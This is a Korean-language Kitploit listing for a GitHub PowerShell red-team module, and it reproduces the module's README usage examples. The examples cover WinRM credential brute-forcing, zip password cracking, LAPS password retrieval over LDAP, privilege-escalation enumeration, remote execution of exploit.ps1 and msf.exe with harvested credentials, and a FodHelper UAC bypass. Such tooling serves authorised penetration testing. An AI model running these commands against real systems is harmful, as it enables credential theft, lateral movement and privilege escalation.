Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PowerShell-Red-Team — 레드 팀원이 작전 중 사용할 수 있는 PowerShell 함수 모음 | Kitploit
도구/GitHubGitHub/tobor88/powershell-red-team
Privilege EscalationPassword AttacksLateral MovementInformation GatheringPenetration TestingRed Teaming
GitHubtobor88/powershell-red-team

PowerShell-Red-Team

레드 팀원이 작전 중 사용할 수 있는 PowerShell 함수 모음

저장소 보기
55192602년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PowerShell-Red-Team-Enum

레드 팀 구성원이 컴퓨터에서 데이터를 수집하거나 대상에 접근하는 데 사용할 수 있는 PowerShell 함수 모음입니다. RedTeamEnum 모듈에 포함된 명령어에 대한 ps1 파일을 추가했습니다. 이를 통해 원하는 명령어 하나만 쉽게 찾아 사용할 수 있습니다. 전체 모듈을 원한다면 RedTeamEnum 디렉토리와 내용을 장치에 다운로드한 후 다음 작업을 수행하세요.

C:\PS> robocopy .\RedTeamEnum $env:USERPROFILE\Documents\WindowsPowerShell\Modules\RedTeamEnum *
# 이 명령은 모듈을 쉽게 가져올 수 있는 위치로 복사합니다. OneDrive 동기화를 사용하는 경우 $env:USERPROFILE\OneDrive\Documents\WindowsPowerShell\Modules\RedTeamEnum을 대신 사용해야 할 수 있습니다.

C:\PS> Import-Module -Name RedTeamEnum -Verbose
# 이 명령은 모듈의 모든 명령을 가져옵니다.

C:\PS> Get-Command -Module RedTeamEnum
# 이 명령은 모듈의 모든 명령을 나열합니다.
  • Convert-Base64.ps1은 이름에서 알 수 있듯이 텍스트를 Base64 형식으로 인코딩 및/또는 디코딩하는 함수입니다.
C:\PS> Convert-Base64 -Value "Convert me to base64!" -Encode

C:\PS> Convert-Base64 -Value "Q29udmVydCBtZSB0byBiYXNlNjQh" -Decode
  • Convert-StringToHash.ps1은 문자열 값을 해시 값으로 변환하는 함수입니다.
C:\PS> Convert-StringToHash -String "Convert me to base64!"
C:\PS> Convert-StringToHash -String "Password123" -Encoding UTF8 -Algorithm MD5
# 위 두 예제 모두 문자열 Password123을 MD5 해시 값으로 변환합니다.
  • Convert-SID.ps1은 SID 값을 사용자 이름으로, 사용자 이름을 SID 값으로 변환하는 함수입니다.
C:\PS> Convert-SID -Username tobor
# 위 예제는 tobor의 SID 값을 반환합니다.

C:\PS> Convert-SID -SID S-1-5-21-2860287465-2011404039-792856344-500
# 위 예제는 SID 값을 해당 사용자 이름으로 변환합니다.
  • Test-BruteZipPassword는 비밀번호 파일을 사용하여 7zip을 이용해 암호로 보호된 zip 파일을 무차별 대입하는 함수입니다.
C:\PS> Test-BruteForceZipPassword -PassFile 'C:\Users\USER\Downloads\Applications\pass.txt' -Path 'C:\Users\USER\Downloads\Applications\KiTTY.7z' -ZipExe 'C:\Program Files\7-Zip\7z.exe'
# 이 예제는 pass.txt 파일의 비밀번호를 사용하여 암호로 보호된 KiTTY.7z 파일의 암호를 크랙합니다.
  • Test-BruteForceCredentials는 WinRM을 사용하여 사용자 비밀번호를 무차별 대입하는 함수입니다.
C:\PS> Test-BruteForceCredentials -ComputerName DC01.domain.com -UseSSL -Username 'admin','administrator' -Passwd 'Password123!' -SleepMinutes 5
# 이 예제는 하나의 정의된 비밀번호를 원격 컴퓨터 DC01.domain.com의 admin 및 administrator 사용자 모두에 대해 WinRM over HTTPS를 사용하여 테스트하며, 각 시도 사이에 5분의 시간 간격을 둡니다.

C:\PS> Test-BruteForceCredentials -ComputerName File.domain.com -UserFile C:\Temp\users.txt -PassFile C:\Temp\rockyou.txt
# 이 예제는 rockyou.txt의 모든 비밀번호를 users.txt 파일의 모든 사용자 이름에 대해 시도 간 지연 없이 테스트합니다.
  • Get-LdapInfo는 일반 LDAP 쿼리를 수행하는 매우 자랑스러운 함수입니다. 출력에는 두 개의 속성만 표시되지만, 객체와 관련된 모든 속성은 Select-Object -Property *로 파이프하거나 -Detailed 스위치 매개변수를 사용하여 볼 수 있습니다.
C:\PS> Get-LdapInfo -Detailed -SPNNamedObjects -Domain domain.com -Credential (Get-Credential)
# 위 명령은 domain.com의 반환 객체에 대한 모든 속성을 반환합니다.
#
C:\PS> Get-LdapInfo -DomainControllers | Select-Object -Property 'Name','ms-Mcs-AdmPwd'
# 관리자로 실행하면 로컬 관리자 계정의 LAPS 비밀번호를 반환합니다.
#
C:\PS> Get-LdapInfo -ListUsers | Where-Object -Property SamAccountName -like "user.samname"
# 참고: "-Detailed" 스위치를 포함하고 출력을 Where-Object로 파이프하면 속성이 반환되지 않습니다. 결과의 모든 속성을 표시하려면 아래 형식을 사용해야 합니다.
#
C:\PS> Get-LdapInfo -AllServers | Where-Object -Property LogonCount -gt 1 | Select-Object -Property *

  • Get-NetworkShareInfo는 원격 또는 로컬 컴퓨터에서 사용 가능한 네트워크 공유에 대한 정보를 검색 및/또는 무차별 대입 검색하는 cmdlet입니다.
C:\PS> Get-NetworkShareInfo -ShareName C$
# 위 예제는 로컬 컴퓨터의 C$ 공유에 대한 정보를 반환합니다.
#결과
Name         : C$
InstallDate  :
Description  : Default share
Path         : C:\
ComputerName : TOBORDESKTOP
Status       : OK

C:\PS> Get-NetworkShareInfo -ShareName NETLOGON,SYSVOL,C$ -ComputerName DC01.domain.com, DC02.domain.com, 10.10.10.1
# 위 예제는 3개의 원격 장치 DC01, DC02 및 10.10.10.1에서 NETLOGON, SYSVOL 및 C$를 검색하고 정보를 반환합니다.
  • Test-PrivEsc는 WSUS 업데이트가 HTTP를 통해 권한 상승에 취약한지, 일반 텍스트 자격 증명이 일반적인 위치에 저장되어 있는지, AlwaysInstallElevated가 권한 상승에 취약한지, 따옴표가 없는 서비스 경로가 존재하는지, 서비스에 대한 약한 쓰기 권한 가능성을 열거하는 데 사용할 수 있는 함수입니다.
 C:\PS> Test-PrivEsc
  • Get-InitialEnum은 Windows 운영 체제의 기본 사항을 열거하여 가능한 취약점을 더 잘 파악하는 데 도움이 되는 함수입니다.
 C:\PS> Get-InitialEnum
  • Start-SimpleHTTPServer는 파일 다운로드를 위한 HTTP 서버를 호스팅하는 함수입니다. Python의 SimpleHTTPServer 모듈과 유사하게 설계되었습니다. 웹 서버를 통해 디렉토리를 탐색할 수 없습니다. 호스팅될 다운로드 파일은 이 명령을 실행할 때 현재 디렉토리에 있는 파일입니다.
C:\PS> Start-SimpleHTTPServer
8000 포트에서 HTTP 서버 열기

#또는
C:\PS> Start-SimpleHTTPServer -Port 80
# 80 포트에서 HTTP 서버 열기
  • Invoke-PortScan.ps1은 대상의 가능한 모든 TCP 포트를 스캔하는 함수입니다. 향후 UDP와 포트 범위 정의 기능을 포함하여 개선할 예정입니다. 이 함수는 매우 느리기 때문에 솔직히 사용할 가치가 없습니다. 스레딩은 제 약점이며, 이 함수에서 작업할 계획입니다.
 C:\PS> Invoke-PortScan -IpAddress 192.168.0.1
  • Invoke-PingSweep은 서브넷 범위의 ping 스윕을 수행하는 함수입니다.
C:\PS> Invoke-PingSweep -Subnet 192.168.1.0 -Start 192 -End 224 -Source Singular
# 참고: 소스 매개변수는 IP 소스 라우팅 값이 "Yes"인 경우에만 작동합니다.

C:\PS> Invoke-PingSweep -Subnet 10.0.0.0 -Start 1 -End 20 -Count 2
# Count의 기본값은 1입니다.

C:\PS> Invoke-PingSweep -Subnet 172.16.0.0 -Start 64 -End 128 -Count 3 -Source Multiple
  • Invoke-UseCreds는 침투 테스트 중 획득한 자격 증명을 사용하는 과정을 간소화하기 위해 만든 함수입니다. -Password 대신 -Passwd를 사용하는 이유는 해당 매개변수가 정의될 때 보안 문자열로 구성되어야 하지만, 이 함수에서는 해당 필드에 값을 입력할 때 보안 문자열이 아니기 때문입니다. 값을 설정한 후 보안 문자열로 변환됩니다.
# 아래 명령은 입력된 자격 증명을 사용하여 msf.exe 실행 파일을 tobor 사용자로 실행합니다.
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\msf.exe -Verbose

이 cmdlet은 로컬 컴퓨터의 파일을 원격 컴퓨터에서 실행하는 데에도 사용할 수 있습니다.

# 아래 명령은 입력된 자격 증명을 사용하여 DC01 및 DC02에서 tobor 사용자로 exploit.ps1 실행 파일을 WinRM을 통해 실행합니다.
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\exploit.ps1 -ComputerName "DC01.domain.com","DC02.domain.com"

# 아래 명령은 입력된 자격 증명을 사용하여 DC01 및 DC02에서 tobor 사용자로 exploit.ps1 실행 파일을 WinRM over HTTPS를 통해 실행합니다.
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\exploit.ps1 -ComputerName "DC01.domain.com","DC02.domain.com" -UseSSL
  • Invoke-FodHelperBypass는 UAC 우회가 작동하는지 먼저 테스트한 후 실행하여 권한을 상승시키는 함수입니다. 물론 로컬 관리자 그룹의 구성원이 실행해야 하며, 이 우회는 현재 셸의 권한을 상승시킵니다. 실행할 프로그램을 정의할 수 있으며, msfvenom 페이로드뿐만 아니라 cmd, powershell 또는 명령 실행도 가능합니다.
C:\PS> Invoke-FodHelperBypass -Program "powershell" -Verbose
# 또는
C:\PS> Invoke-FodHelperBypass -Program "cmd /c msf.exe" -Verbose
도구 다운로드